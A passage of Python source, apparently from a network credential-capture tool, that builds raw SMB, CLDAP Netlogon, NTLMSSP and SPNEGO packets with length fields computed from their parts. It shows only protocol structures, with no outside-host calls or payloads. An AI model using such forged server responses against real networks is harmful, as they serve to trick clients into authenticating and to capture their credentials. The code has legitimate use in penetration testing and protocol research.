|
self.fields["NTLMSSPNtTargetInfoLen"] = StructWithLenPython2or3("<h", len(CalculateLenAvpairs))
|
|
self.fields["NTLMSSPNtTargetInfoMaxLen"] = StructWithLenPython2or3("<h", len(CalculateLenAvpairs))
|
|
##### IvPair Calculation:
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
|
|
|
|
##cldap
|
|
class CLDAPNetlogon(Packet):
|
|
fields = OrderedDict([
|
|
("ParserHeadASNID", "\x30"),
|
|
("ParserHeadASNLenOfLen", "\x84"),
|
|
("ParserHeadASNLen", "\x00\x00\x00\x9D"),
|
|
("MessageIDASNID", "\x02"),
|
|
("MessageIDASNLen", "\x02"),
|
|
("MessageIDASNStr", "\x00\xc4"),#First MsgID
|
|
("OpHeadASNID", "\x64"),
|
|
("OpHeadASNIDLenOfLen", "\x84"),
|
|
("OpHeadASNIDLen", "\x00\x00\x00\xc7"),
|
|
("Status", "\x04"),
|
|
("StatusASNLen", "\x00"),
|
|
("StatusASNStr", ""),
|
|
("SequenceHeader", "\x30"),
|
|
("SequenceHeaderLenOfLen", "\x84"),
|
|
("SequenceHeaderLen", "\x00\x00\x00\x8b"),
|
|
#Netlogon packet starts here....
|
|
("PartAttribHead", "\x30"),
|
|
("PartAttribHeadLenofLen", "\x84"),
|
|
("PartAttribHeadLen", "\x00\x00\x00\x85"),
|
|
("NetlogonHead", "\x04"),
|
|
("NetlogonLen", "\x08"),
|
|
("NetlogonStr", "Netlogon"),
|
|
("NetAttribHead", "\x31"),
|
|
("NetAttribLenOfLen", "\x84"),
|
|
("NetAttribLen", "\x00\x00\x00\x75"),
|
|
("NetAttrib1Head", "\x04"),
|
|
("NetAttrib1Len", "\x73"),
|
|
("NTLogonOpcode", "\x17\x00"),#SamLogonRespEx opcode
|
|
("NTLogonSbz", "\x00\x00"),
|
|
("NTLogonFlags", "\xFD\xF3\x03\x00"),
|
|
("NTLogonDomainGUID", "\x3E\xDE\x55\x61\xF0\x79\x8F\x44\x83\x10\x83\x63\x08\xD4\xBB\x26"),
|
|
("NTLogonForestName", "\x04\x73\x6D\x62\x33\x05\x6C\x6F\x63\x61\x6C"),
|
|
("NTLogonForestNameNull", "\x00"),
|
|
("NTLogonDomainNamePtr", "\xc0"),
|
|
("NTLogonDomainNamePtrOffset", "\x18"),
|
|
("NTLogonPDCNBTName", "\x0F\x57\x49\x4E\x2D\x48\x51\x46\x42\x34\x4F\x52\x34\x4B\x49\x4D"),
|
|
("NTLogonPDCNBTTLDPtr", "\xC0\x18"),
|
|
("NTLogonDomainNameShort", "\x04\x53\x4D\x42\x33"),
|
|
("NTLogonDomainNameShortNull", "\x00"),
|
|
("NTLogonDomainNBTName", "\x0F\x57\x49\x4E\x2D\x48\x51\x46\x42\x34\x4F\x52\x34\x4B\x49\x4D"),
|
|
("NTLogonDomainNBTNameNull", "\x00"),
|
|
("NTLogonUsername", "\x00"),
|
|
("DCSiteName", "\x17\x44\x65\x66\x61\x75\x6C\x74\x2D\x46\x69\x72\x73\x74\x2D\x53\x69\x74\x65\x2D\x4E\x61\x6D\x65\x00"),#static 95% PDC use this.
|
|
("ClientSiteNamePtr", "\xc0"),
|
|
("ClientSiteNamePtrOffset", "\x50"),
|
|
("NTLogonVersion", "\x05\x00\x00\x00"),
|
|
("LMNTToken", "\xff\xff"),
|
|
("LM2Token", "\xff\xff"),#End netlogon.
|
|
("CLDAPMessageIDHeader", "\x30\x84\x00\x00\x00\x11"),
|
|
("CLDAPMessageIDInt", "\x02"),
|
|
("CLDAPMessageIDlen", "\x02"),
|
|
("CLDAPMessageIDStr", "\x00\xc4"),#Second MsgID
|
|
("SearchDone", "\x65\x84\x00\x00\x00\x07"),
|
|
("SearchDoneMatched", "\x0A\x01\x00\x04\x00\x04\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
###### LDAP Packet Len
|
|
CalculatePacketLen = str(self.fields["MessageIDASNID"])+str(self.fields["MessageIDASNLen"])+str(self.fields["MessageIDASNStr"])+str(self.fields["OpHeadASNID"])+str(self.fields["OpHeadASNIDLenOfLen"])+str(self.fields["OpHeadASNIDLen"])+str(self.fields["Status"])+str(self.fields["StatusASNLen"])+str(self.fields["StatusASNStr"])+str(self.fields["SequenceHeader"])+str(self.fields["SequenceHeaderLen"])+str(self.fields["SequenceHeaderLenOfLen"])
|
|
OperationPacketLen = str(self.fields["Status"])+str(self.fields["StatusASNLen"])+str(self.fields["StatusASNStr"])+str(self.fields["SequenceHeader"])+str(self.fields["SequenceHeaderLen"])+str(self.fields["SequenceHeaderLenOfLen"])
|
|
|
|
###### Netlogon + Search Successfull Len
|
|
CalculateNetlogonLen = str(self.fields["NTLogonOpcode"])+str(self.fields["NTLogonSbz"])+str(self.fields["NTLogonFlags"])+str(self.fields["NTLogonDomainGUID"])+str(self.fields["NTLogonForestName"])+str(self.fields["NTLogonForestNameNull"])+str(self.fields["NTLogonDomainNamePtr"])+str(self.fields["NTLogonDomainNamePtrOffset"])+str(self.fields["NTLogonPDCNBTName"])+str(self.fields["NTLogonPDCNBTTLDPtr"])+str(self.fields["NTLogonDomainNameShort"])+str(self.fields["NTLogonDomainNameShortNull"])+str(self.fields["NTLogonDomainNBTName"])+str(self.fields["NTLogonDomainNBTNameNull"])+str(self.fields["NTLogonUsername"])+str(self.fields["DCSiteName"])+str(self.fields["ClientSiteNamePtr"])+str(self.fields["ClientSiteNamePtrOffset"])+str(self.fields["NTLogonVersion"])+str(self.fields["LMNTToken"])+str(self.fields["LM2Token"]) #115 now.
|
|
|
|
|
|
CalculateNetlogonOffset = str(self.fields["NTLogonForestName"])+str(self.fields["NTLogonForestNameNull"])+str(self.fields["NTLogonDomainNamePtr"])+str(self.fields["NTLogonDomainNamePtrOffset"])+str(self.fields["NTLogonPDCNBTName"])+str(self.fields["NTLogonPDCNBTTLDPtr"])+str(self.fields["NTLogonDomainNameShort"])+str(self.fields["NTLogonDomainNameShortNull"])+str(self.fields["NTLogonDomainNBTName"])+str(self.fields["NTLogonDomainNBTNameNull"])+str(self.fields["NTLogonUsername"])+str(self.fields["DCSiteName"])
|
|
|
|
##### LDAP ASN Len Calculation:
|
|
self.fields["NetAttrib1Len"] = StructWithLenPython2or3(">B", len(CalculateNetlogonLen))
|
|
self.fields["NetAttribLen"] = StructWithLenPython2or3(">L", len(CalculateNetlogonLen)+2)
|
|
self.fields["PartAttribHeadLen"] = StructWithLenPython2or3(">L", len(CalculateNetlogonLen)+18)
|
|
self.fields["SequenceHeaderLen"] = StructWithLenPython2or3(">L", len(CalculateNetlogonLen)+24)
|
|
self.fields["OpHeadASNIDLen"] = StructWithLenPython2or3(">L", len(CalculateNetlogonLen)+32)
|
|
self.fields["ParserHeadASNLen"] = StructWithLenPython2or3(">L", len(CalculateNetlogonLen)+42)
|
|
######
|
|
self.fields["ClientSiteNamePtrOffset"] = StructWithLenPython2or3(">B", len(CalculateNetlogonOffset)-1)
|
|
|
|
##### SMB Packets #####
|
|
class SMBHeader(Packet):
|
|
fields = OrderedDict([
|
|
("proto", "\xff\x53\x4d\x42"),
|
|
("cmd", "\x72"),
|
|
("errorcode", "\x00\x00\x00\x00"),
|
|
("flag1", "\x00"),
|
|
("flag2", "\x00\x00"),
|
|
("pidhigh", "\x00\x00"),
|
|
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
("reserved", "\x00\x00"),
|
|
("tid", "\x00\x00"),
|
|
("pid", "\x00\x00"),
|
|
("uid", "\x00\x00"),
|
|
("mid", "\x00\x00"),
|
|
])
|
|
|
|
class SMBNego(Packet):
|
|
fields = OrderedDict([
|
|
("wordcount", "\x00"),
|
|
("bcc", "\x62\x00"),
|
|
("data", "")
|
|
])
|
|
|
|
def calculate(self):
|
|
self.fields["bcc"] = StructPython2or3("<h",self.fields["data"])
|
|
|
|
class SMBNegoData(Packet):
|
|
fields = OrderedDict([
|
|
("wordcount", "\x00"),
|
|
("bcc", "\x54\x00"),
|
|
("separator1","\x02" ),
|
|
("dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
|
|
("separator2","\x02"),
|
|
("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
CalculateBCC = str(self.fields["separator1"])+str(self.fields["dialect1"])
|
|
CalculateBCC += str(self.fields["separator2"])+str(self.fields["dialect2"])
|
|
self.fields["bcc"] = StructWithLenPython2or3("<h", len(CalculateBCC))
|
|
|
|
class SMBSessionData(Packet):
|
|
fields = OrderedDict([
|
|
("wordcount", "\x0a"),
|
|
("AndXCommand", "\xff"),
|
|
("reserved","\x00"),
|
|
("andxoffset", "\x00\x00"),
|
|
("maxbuff","\xff\xff"),
|
|
("maxmpx", "\x02\x00"),
|
|
("vcnum","\x01\x00"),
|
|
("sessionkey", "\x00\x00\x00\x00"),
|
|
("PasswordLen","\x18\x00"),
|
|
("reserved2","\x00\x00\x00\x00"),
|
|
("bcc","\x3b\x00"),
|
|
("AccountPassword",""),
|
|
("AccountName",""),
|
|
("AccountNameTerminator","\x00"),
|
|
("PrimaryDomain","WORKGROUP"),
|
|
("PrimaryDomainTerminator","\x00"),
|
|
("NativeOs","Unix"),
|
|
("NativeOsTerminator","\x00"),
|
|
("NativeLanman","Samba"),
|
|
("NativeLanmanTerminator","\x00"),
|
|
|
|
])
|
|
def calculate(self):
|
|
CompleteBCC = str(self.fields["AccountPassword"])+str(self.fields["AccountName"])+str(self.fields["AccountNameTerminator"])+str(self.fields["PrimaryDomain"])+str(self.fields["PrimaryDomainTerminator"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLanman"])+str(self.fields["NativeLanmanTerminator"])
|
|
self.fields["bcc"] = StructWithLenPython2or3("<h", len(CompleteBCC))
|
|
self.fields["PasswordLen"] = StructWithLenPython2or3("<h", len(str(self.fields["AccountPassword"])))
|
|
|
|
class SMBNegoFingerData(Packet):
|
|
fields = OrderedDict([
|
|
("separator1","\x02" ),
|
|
("dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
|
|
("separator2","\x02"),
|
|
("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
|
|
("separator3","\x02"),
|
|
("dialect3", "\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"),
|
|
("separator4","\x02"),
|
|
("dialect4", "\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
|
|
("separator5","\x02"),
|
|
("dialect5", "\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
|
|
("separator6","\x02"),
|
|
("dialect6", "\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
|
|
])
|
|
|
|
class SMBSessionFingerData(Packet):
|
|
fields = OrderedDict([
|
|
("wordcount", "\x0c"),
|
|
("AndXCommand", "\xff"),
|
|
("reserved","\x00" ),
|
|
("andxoffset", "\x00\x00"),
|
|
("maxbuff","\x04\x11"),
|
|
("maxmpx", "\x32\x00"),
|
|
("vcnum","\x00\x00"),
|
|
("sessionkey", "\x00\x00\x00\x00"),
|
|
("securitybloblength","\x4a\x00"),
|
|
("reserved2","\x00\x00\x00\x00"),
|
|
("capabilities", "\xd4\x00\x00\xa0"),
|
|
("bcc1",""),
|
|
("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
|
|
|
|
])
|
|
def calculate(self):
|
|
self.fields["bcc1"] = StructPython2or3('<h',self.fields["Data"])
|
|
|
|
class SMBTreeConnectData(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x04"),
|
|
("AndXCommand", "\xff"),
|
|
("Reserved","\x00" ),
|
|
("Andxoffset", "\x00\x00"),
|
|
("Flags","\x08\x00"),
|
|
("PasswdLen", "\x01\x00"),
|
|
("Bcc","\x1b\x00"),
|
|
("Passwd", "\x00"),
|
|
("Path",""),
|
|
("PathTerminator","\x00"),
|
|
("Service","?????"),
|
|
("Terminator", "\x00"),
|
|
|
|
])
|
|
def calculate(self):
|
|
self.fields["PasswdLen"] = StructWithLenPython2or3("<h", len(str(self.fields["Passwd"])))[:2]
|
|
BccComplete = str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<h", len(BccComplete))
|
|
|
|
class RAPNetServerEnum3Data(Packet):
|
|
fields = OrderedDict([
|
|
("Command", "\xd7\x00"),
|
|
("ParamDescriptor", "WrLehDzz"),
|
|
("ParamDescriptorTerminator", "\x00"),
|
|
("ReturnDescriptor","B16BBDz"),
|
|
("ReturnDescriptorTerminator", "\x00"),
|
|
("DetailLevel", "\x01\x00"),
|
|
("RecvBuff","\xff\xff"),
|
|
("ServerType", "\x00\x00\x00\x80"),
|
|
("TargetDomain","SMB"),
|
|
("RapTerminator","\x00"),
|
|
("TargetName","ABCD"),
|
|
("RapTerminator2","\x00"),
|
|
])
|
|
|
|
class SMBTransRAPData(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x0e"),
|
|
("TotalParamCount", "\x24\x00"),
|
|
("TotalDataCount","\x00\x00" ),
|
|
("MaxParamCount", "\x08\x00"),
|
|
("MaxDataCount","\xff\xff"),
|
|
("MaxSetupCount", "\x00"),
|
|
("Reserved","\x00\x00"),
|
|
("Flags", "\x00"),
|
|
("Timeout","\x00\x00\x00\x00"),
|
|
("Reserved1","\x00\x00"),
|
|
("ParamCount","\x24\x00"),
|
|
("ParamOffset", "\x5a\x00"),
|
|
("DataCount", "\x00\x00"),
|
|
("DataOffset", "\x7e\x00"),
|
|
("SetupCount", "\x00"),
|
|
("Reserved2", "\x00"),
|
|
("Bcc", "\x3f\x00"),
|
|
("Terminator", "\x00"),
|
|
("PipeName", "\\PIPE\\LANMAN"),
|
|
("PipeTerminator","\x00\x00"),
|
|
("Data", ""),
|
|
|
|
])
|
|
def calculate(self):
|
|
#Padding
|
|
if len(str(self.fields["Data"]))%2==0:
|
|
self.fields["PipeTerminator"] = "\x00\x00\x00\x00"
|
|
else:
|
|
self.fields["PipeTerminator"] = "\x00\x00\x00"
|
|
##Convert Path to Unicode first before any Len calc.
|
|
self.fields["PipeName"] = self.fields["PipeName"].encode('utf-16le').decode('latin-1')
|
|
##Data Len
|
|
self.fields["TotalParamCount"] = StructWithLenPython2or3("<i", len(str(self.fields["Data"])))[:2]
|
|
self.fields["ParamCount"] = StructWithLenPython2or3("<i", len(str(self.fields["Data"])))[:2]
|
|
##Packet len
|
|
FindRAPOffset = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved1"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved2"])+str(self.fields["Bcc"])+str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])
|
|
self.fields["ParamOffset"] = StructWithLenPython2or3("<i", len(FindRAPOffset)+32)[:2]
|
|
##Bcc Buff Len
|
|
BccComplete = str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])+str(self.fields["Data"])
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<i", len(BccComplete))[:2]
|
|
|
|
class SMBNegoAnsLM(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x11"),
|
|
("Dialect", ""),
|
|
("Securitymode", "\x03"),
|
|
("MaxMpx", "\x32\x00"),
|
|
("MaxVc", "\x01\x00"),
|
|
("Maxbuffsize", "\x04\x41\x00\x00"),
|
|
("Maxrawbuff", "\x00\x00\x01\x00"),
|
|
("Sessionkey", "\x00\x00\x00\x00"),
|
|
("Capabilities", "\xfc\x3e\x01\x00"),
|
|
("Systemtime", SMBTime()),
|
|
("Srvtimezone", "\x2c\x01"),
|
|
("Keylength", "\x08"),
|
|
("Bcc", "\x10\x00"),
|
|
("Key", ""),
|
|
("Domain", settings.Config.Domain),
|
|
("DomainNull", "\x00\x00"),
|
|
("Server", settings.Config.MachineName),
|
|
("ServerNull", "\x00\x00"),
|
|
])
|
|
|
|
|
|
def calculate(self):
|
|
self.fields["Domain"] = self.fields["Domain"].encode('utf-16le').decode('latin-1')
|
|
self.fields["Server"] = self.fields["Server"].encode('utf-16le').decode('latin-1')
|
|
CompleteBCCLen = str(self.fields["Key"])+str(self.fields["Domain"])+str(self.fields["DomainNull"])+str(self.fields["Server"])+str(self.fields["ServerNull"])
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<h",len(CompleteBCCLen))
|
|
self.fields["Keylength"] = StructWithLenPython2or3("<h",len(self.fields["Key"]))[0]
|
|
|
|
class SMBNegoAns(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x11"),
|
|
("Dialect", ""),
|
|
("Securitymode", "\x03"),
|
|
("MaxMpx", "\x32\x00"),
|
|
("MaxVc", "\x01\x00"),
|
|
("MaxBuffSize", "\x04\x41\x00\x00"),
|
|
("MaxRawBuff", "\x00\x00\x01\x00"),
|
|
("SessionKey", "\x00\x00\x00\x00"),
|
|
("Capabilities", "\xfd\xf3\x01\x80"),
|
|
("SystemTime", SMBTime()),
|
|
("SrvTimeZone", "\xf0\x00"),
|
|
("KeyLen", "\x00"),
|
|
("Bcc", "\x57\x00"),
|
|
("Guid", urandom(16).decode('latin-1')),
|
|
("InitContextTokenASNId", "\x60"),
|
|
("InitContextTokenASNLen", "\x5b"),
|
|
("ThisMechASNId", "\x06"),
|
|
("ThisMechASNLen", "\x06"),
|
|
("ThisMechASNStr", "\x2b\x06\x01\x05\x05\x02"),
|
|
("SpNegoTokenASNId", "\xA0"),
|
|
("SpNegoTokenASNLen", "\x51"),
|
|
("NegTokenASNId", "\x30"),
|
|
("NegTokenASNLen", "\x4f"),
|
|
("NegTokenTag0ASNId", "\xA0"),
|
|
("NegTokenTag0ASNLen", "\x30"),
|
|
("NegThisMechASNId", "\x30"),
|
|
("NegThisMechASNLen", "\x2e"),
|
|
("NegThisMech4ASNId", "\x06"),
|
|
("NegThisMech4ASNLen", "\x09"),
|
|
("NegThisMech4ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
|
|
("NegTokenTag3ASNId", "\xA3"),
|
|
("NegTokenTag3ASNLen", "\x1b"),
|
|
("NegHintASNId", "\x30"),
|
|
("NegHintASNLen", "\x19"),
|
|
("NegHintTag0ASNId", "\xa0"),
|
|
("NegHintTag0ASNLen", "\x17"),
|
|
("NegHintFinalASNId", "\x1b"),
|
|
("NegHintFinalASNLen", "\x15"),
|
|
("NegHintFinalASNStr", "not_defined_in_RFC4178@please_ignore"),
|
|
])
|
|
|
|
def calculate(self):
|
|
CompleteBCCLen1 = str(self.fields["Guid"])+str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
|
|
AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
|
|
AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
|
|
MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])
|
|
Tag3Len = str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
|
|
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<h",len(CompleteBCCLen1))
|
|
self.fields["InitContextTokenASNLen"] = StructWithLenPython2or3("<B", len(AsnLenStart))
|
|
self.fields["ThisMechASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["ThisMechASNStr"])))
|
|
self.fields["SpNegoTokenASNLen"] = StructWithLenPython2or3("<B", len(AsnLen2))
|
|
self.fields["NegTokenASNLen"] = StructWithLenPython2or3("<B", len(AsnLen2)-2)
|
|
self.fields["NegTokenTag0ASNLen"] = StructWithLenPython2or3("<B", len(MechTypeLen))
|
|
self.fields["NegThisMechASNLen"] = StructWithLenPython2or3("<B", len(MechTypeLen)-2)
|
|
self.fields["NegThisMech4ASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["NegThisMech4ASNStr"])))
|
|
self.fields["NegTokenTag3ASNLen"] = StructWithLenPython2or3("<B", len(Tag3Len))
|
|
self.fields["NegHintASNLen"] = StructWithLenPython2or3("<B", len(Tag3Len)-2)
|
|
self.fields["NegHintTag0ASNLen"] = StructWithLenPython2or3("<B", len(Tag3Len)-4)
|
|
self.fields["NegHintFinalASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["NegHintFinalASNStr"])))
|
|
|
|
class SMBNegoKerbAns(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x11"),
|
|
("Dialect", ""),
|
|
("Securitymode", "\x03"),
|
|
("MaxMpx", "\x32\x00"),
|
|
("MaxVc", "\x01\x00"),
|
|
("MaxBuffSize", "\x04\x41\x00\x00"),
|
|
("MaxRawBuff", "\x00\x00\x01\x00"),
|
|
("SessionKey", "\x00\x00\x00\x00"),
|
|
("Capabilities", "\xfd\xf3\x01\x80"),
|
|
("SystemTime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
|
|
("SrvTimeZone", "\xf0\x00"),
|
|
("KeyLen", "\x00"),
|
|
("Bcc", "\x57\x00"),
|
|
("Guid", urandom(16).decode('latin-1')),
|
|
("InitContextTokenASNId", "\x60"),
|
|
("InitContextTokenASNLen", "\x5b"),
|
|
("ThisMechASNId", "\x06"),
|
|
("ThisMechASNLen", "\x06"),
|
|
("ThisMechASNStr", "\x2b\x06\x01\x05\x05\x02"),
|
|
("SpNegoTokenASNId", "\xA0"),
|
|
("SpNegoTokenASNLen", "\x51"),
|
|
("NegTokenASNId", "\x30"),
|
|
("NegTokenASNLen", "\x4f"),
|
|
("NegTokenTag0ASNId", "\xA0"),
|
|
("NegTokenTag0ASNLen", "\x30"),
|
|
("NegThisMechASNId", "\x30"),
|
|
("NegThisMechASNLen", "\x2e"),
|
|
("NegThisMech1ASNId", "\x06"),
|
|
("NegThisMech1ASNLen", "\x09"),
|
|
("NegThisMech1ASNStr", "\x2a\x86\x48\x82\xf7\x12\x01\x02\x02"),
|
|
("NegThisMech2ASNId", "\x06"),
|
|
("NegThisMech2ASNLen", "\x09"),
|
|
("NegThisMech2ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02"),
|
|
("NegThisMech3ASNId", "\x06"),
|
|
("NegThisMech3ASNLen", "\x0a"),
|
|
("NegThisMech3ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02\x03"),
|
|
("NegThisMech4ASNId", "\x06"),
|
|
("NegThisMech4ASNLen", "\x09"),
|
|
("NegThisMech4ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
|
|
("NegTokenTag3ASNId", "\xA3"),
|
|
("NegTokenTag3ASNLen", "\x1b"),
|
|
("NegHintASNId", "\x30"),
|
|
("NegHintASNLen", "\x19"),
|
|
("NegHintTag0ASNId", "\xa0"),
|
|
("NegHintTag0ASNLen", "\x17"),
|
|
("NegHintFinalASNId", "\x1b"),
|
|
("NegHintFinalASNLen", "\x15"),
|
|
("NegHintFinalASNStr", settings.Config.MachineNego),
|
|
])
|
|
|
|
def calculate(self):
|
|
CompleteBCCLen1 = str(self.fields["Guid"])+str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.f